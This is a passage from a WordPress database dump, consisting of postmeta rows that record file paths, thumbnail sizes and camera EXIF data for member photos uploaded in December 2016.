\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2966,716,'_wp_attached_file','2016/12/Diandra-Eason-chapter-photo.jpg'),(2967,716,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:168;s:6:\"height\";i:178;s:4:\"file\";s:39:\"2016/12/Diandra-Eason-chapter-photo.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:39:\"Diandra-Eason-chapter-photo-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:39:\"Diandra-Eason-chapter-photo-168x110.jpg\";s:5:\"width\";i:168;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(2968,717,'_wp_attached_file','2016/12/ECogdell-e1484269686848.jpg'),(2969,717,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:511;s:6:\"height\";i:565;s:4:\"file\";s:35:\"2016/12/ECogdell-e1484269686848.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"ECogdell-e1484269686848-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"ECogdell-e1484269686848-271x300.jpg\";s:5:\"width\";i:271;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:35:\"ECogdell-e1484269686848-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"grid\";a:4:{s:4:\"file\";s:35:\"ECogdell-e1484269686848-450x300.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"list\";a:4:{s:4:\"file\";s:35:\"ECogdell-e1484269686848-511x300.jpg\";s:5:\"width\";i:511;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:35:\"ECogdell-e1484269686848-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:35:\"ECogdell-e1484269686848-180x180.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:35:\"ECogdell-e1484269686848-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:35:\"ECogdell-e1482289106190-525x600.jpg\";s:5:\"width\";i:525;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.2\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:13:\"iPhone 6 Plus\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1474107038\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"4.15\";s:3:\"iso\";s:2:\"50\";s:13:\"shutter_speed\";s:17:\"0.066666666666667\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"6\";s:8:\"keywords\";a:0:{}}}'),(2970,718,'_wp_attached_file','2016/12/Gloria-Sanders-700x732.jpg'),(2971,718,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:700;s:6:\"height\";i:732;s:4:\"file\";s:34:\"2016/12/Gloria-Sanders-700x732.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:34:\"Gloria-Sanders-700x732-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:34:\"Gloria-Sanders-700x732-287x300.jpg\";s:5:\"width\";i:287;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:34:\"Gloria-Sanders-700x732-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"grid\";a:4:{s:4:\"file\";s:34:\"Gloria-Sanders-700x732-450x300.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"list\";a:4:{s:4:\"file\";s:34:\"Gloria-Sanders-700x732-680x300.jpg\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:34:\"Gloria-Sanders-700x732-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:34:\"Gloria-Sanders-700x732-180x180.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:34:\"Gloria-Sanders-700x732-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:34:\"Gloria-Sanders-700x732-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(2972,719,'_wp_attached_file','2016/12/Jeaneathia1-700x787.jpg'),(2973,719,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:700;s:6:\"height\";i:787;s:4:\"file\";s:31:\"2016/12/Jeaneathia1-700x787.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"Jeaneathia1-700x787-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"Jeaneathia1-700x787-267x300.jpg\";s:5:\"width\";i:267;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:31:\"Jeaneathia1-700x787-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"grid\";a:4:{s:4:\"file\";s:31:\"Jeaneathia1-700x787-450x300.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"list\";a:4:{s:4:\"file\";s:31:\"Jeaneathia1-700x787-680x300.jpg\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:31:\"Jeaneathia1-700x787-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:31:\"Jeaneathia1-700x787-180x180.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:31:\"Jeaneathia1-700x787-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:31:\"Jeaneathia1-700x787-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.4\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:9:\"iPhone 5c\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1431780421\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"4.12\";s:3:\"iso\";s:2:\"50\";s:13:\"shutter_speed\";s:4:\"0.05\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(2976,721,'_wp_attached_file','2016/12/KAlawode.jpeg'),(2977,721,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:480;s:6:\"height\";i:487;s:4:\"file\";s:21:\"2016/12/KAlawode.jpeg\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"KAlawode-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"KAlawode-296x300.jpeg\";s:5:\"width\";i:296;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:21:\"KAlawode-400x400.jpeg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"grid\";a:4:{s:4:\"file\";s:21:\"KAlawode-450x300.jpeg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"list\";a:4:{s:4:\"file\";s:21:\"KAlawode-480x300.jpeg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:21:\"KAlawode-180x110.jpeg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:21:\"KAlawode-180x180.jpeg\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:21:\"KAlawode-300x300.jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2978,722,'_wp_attached_file','2016/12/KathyBarrett.jpg'),(2979,722,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:100;s:6:\"height\";i:100;s:4:\"file\";s:24:\"2016/12/KathyBarrett.jpg\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2980,723,'_wp_attached_file','2016/12/Lanette-250x278.jpg'),(2981,723,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:250;s:6:\"height\";i:278;s:4:\"file\";s:27:\"2016/12/Lanette-250x278.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"Lanette-250x278-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:27:\"Lanette-250x278-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:27:\"Lanette-250x278-180x180.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2982,724,'_wp_attached_file','2016/12/LindaBrigmon.jpg'),(2983,724,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:700;s:6:\"height\";i:724;s:4:\"file\";s:24:\"2016/12/LindaBrigmon.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"LindaBrigmon-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"LindaBrigmon-290x300.jpg\";s:5:\"width\";i:290;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:24:\"LindaBrigmon-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"grid\";a:4:{s:4:\"file\";s:24:\"LindaBrigmon-450x300.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"list\";a:4:{s:4:\"file\";s:24:\"LindaBrigmon-680x300.jpg\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:24:\"LindaBrigmon-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:24:\"LindaBrigmon-180x180.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:24:\"LindaBrigmon-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:24:\"LindaBrigmon-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2984,725,'_wp_attached_file','2016/12/LPrice-e1482289023417.jpg'),(2985,725,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:525;s:6:\"height\";i:700;s:4:\"file\";s:33:\"2016/12/LPrice-e1482289023417.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"LPrice-e1482289023417-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"LPrice-e1482289023417-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:33:\"LPrice-e1482289023417-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"grid\";a:4:{s:4:\"file\";s:33:\"LPrice-e1482289023417-450x300.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"list\";a:4:{s:4:\"file\";s:33:\"LPrice-e1482289023417-525x300.jpg\";s:5:\"width\";i:525;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:33:\"LPrice-e1482289023417-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:33:\"LPrice-e1482289023417-180x180.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:33:\"LPrice-e1482289023417-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:33:\"LPrice-e1482289023417-525x600.jpg\";s:5:\"width\";i:525;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.2\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:13:\"iPhone 6 Plus\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1474108053\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"4.15\";s:3:\"iso\";s:2:\"64\";s:13:\"shutter_speed\";s:17:\"0.066666666666667\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"6\";s:8:\"keywords\";a:0:{}}}'),(2986,726,'_wp_attached_file','2016/12/Michele-Franklin-e1484270239647.jpg'),(2987,726,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:456;s:6:\"height\";i:496;s:4:\"file\";s:43:\"2016/12/Michele-Franklin-e1484270239647.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:43:\"Michele-Franklin-e1484270239647-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:43:\"Michele-Franklin-e1484270239647-276x300.jpg\";s:5:\"width\";i:276;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:43:\"Michele-Franklin-e1484270239647-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"grid\";a:4:{s:4:\"file\";s:43:\"Michele-Franklin-e1484270239647-450x300.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"list\";a:4:{s:4:\"file\";s:43:\"Michele-Franklin-e1484270239647-456x300.jpg\";s:5:\"width\";i:456;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:43:\"Michele-Franklin-e1484270239647-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:43:\"Michele-Franklin-e1484270239647-180x180.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:43:\"Michele-Franklin-e1484270239647-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:28:\"Michele-Franklin-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.2\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:8:\"iPhone 6\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1421348420\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"4.15\";s:3:\"iso\";s:3:\"250\";s:13:\"shutter_speed\";s:17:\"0.033333333333333\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"6\";s:8:\"keywords\";a:0:{}}}'),(2988,727,'_wp_attached_file','2016/12/PatreeceCarter.jpg'),(2989,727,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:100;s:6:\"height\";i:100;s:4:\"file\";s:26:\"2016/12/PatreeceCarter.jpg\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2990,728,'_wp_attached_file','2016/12/QGardner-e1484191796268.jpg'),(2991,728,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:525;s:6:\"height\";i:700;s:4:\"file\";s:35:\"2016/12/QGardner-e1484191796268.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"QGardner-e1484191796268-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"QGardner-e1484191796268-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:35:\"QGardner-e1484191796268-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"grid\";a:4:{s:4:\"file\";s:35:\"QGardner-e1484191796268-450x300.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"list\";a:4:{s:4:\"file\";s:35:\"QGardner-e1484191796268-525x300.jpg\";s:5:\"width\";i:525;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:35:\"QGardner-e1484191796268-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:35:\"QGardner-e1484191796268-180x180.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:35:\"QGardner-e1484191796268-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:35:\"QGardner-e1484191796268-525x600.jpg\";s:5:\"width\";i:525;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.2\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:13:\"iPhone 6 Plus\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1474116466\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"4.15\";s:3:\"iso\";s:2:\"40\";s:13:\"shutter_speed\";s:17:\"0.066666666666667\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"6\";s:8:\"keywords\";a:0:{}}}'),(2992,729,'_wp_attached_file','2016/12/Rosee-Ragin.jpg'),(2993,729,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:700;s:6:\"height\";i:753;s:4:\"file\";s:23:\"2016/12/Rosee-Ragin.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"Rosee-Ragin-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"Rosee-Ragin-279x300.jpg\";s:5:\"width\";i:279;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:23:\"Rosee-Ragin-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"grid\";a:4:{s:4:\"file\";s:23:\"Rosee-Ragin-450x300.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"list\";a:4:{s:4:\"file\";s:23:\"Rosee-Ragin-680x300.jpg\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:23:\"Rosee-Ragin-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:23:\"Rosee-Ragin-180x180.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:23:\"Rosee-Ragin-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:23:\"Rosee-Ragin-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2994,730,'_wp_attached_file','2016/12/RuthConway.jpg'),(2995,730,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:100;s:6:\"height\";i:100;s:4:\"file\";s:22:\"2016/12/RuthConway.jpg\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2996,731,'_wp_attached_file','2016/12/Sadi-Caldarazzo.jpg'),(2997,731,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:250;s:6:\"height\";i:283;s:4:\"file\";s:27:\"2016/12/Sadi-Caldarazzo.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"Sadi-Caldarazzo-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:27:\"Sadi